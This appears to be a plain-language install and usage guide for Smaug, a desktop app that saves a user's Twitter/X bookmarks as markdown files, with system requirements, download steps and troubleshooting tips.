Welcome to Smaug, the tool that automatically collects your Twitter/X bookmarks into markdown format. This guide will help you download and run Smaug quickly, even if you have no technical experience.

💻 System Requirements

To run Smaug, you will need:

• A computer with Windows, macOS, or Linux.
• At least 512 MB of RAM.
• 100 MB of free disk space.
• A web browser (Google Chrome, Firefox, etc.).
• Your Twitter/X account logged in for bookmarking.

📦 Download & Install

1. Visit this page to download: Smaug Releases.

2. On the releases page, find the latest version of Smaug. Look for a file named something like smaug-v1.0.exe for Windows or smaug-v1.0.dmg for macOS.

3. Click on the appropriate download link for your operating system.

4. Once the file finishes downloading, locate it in your downloads folder.

5. Double-click the file:

   • If you downloaded the Windows version, follow the installation prompts.
   • If you downloaded the macOS version, drag the Smaug icon to your Applications folder.

⚙️ How to Use Smaug

1. Open Smaug from your applications or programs list.

2. Log in to your Twitter/X account when prompted.

3. Press the “Start” button to begin collecting your bookmarks.

4. Smaug will automatically convert your bookmarks to markdown and save them to your preferred location.

5. You can access your markdown file anytime to view or edit your bookmarks.

❓ Troubleshooting

• Problem: Smaug won’t start.
  • Solution: Make sure your operating system is updated and that you have all the system requirements met.
• Problem: I can’t find my markdown file.
  • Solution: Check the default save location you chose during setup. You can also search your computer for “.md” files if you forgot where you saved it.
• Problem: Smaug crashed while running.
  • Solution: Restart the application. If the problem persists, check for any updates on the Smaug Releases page.
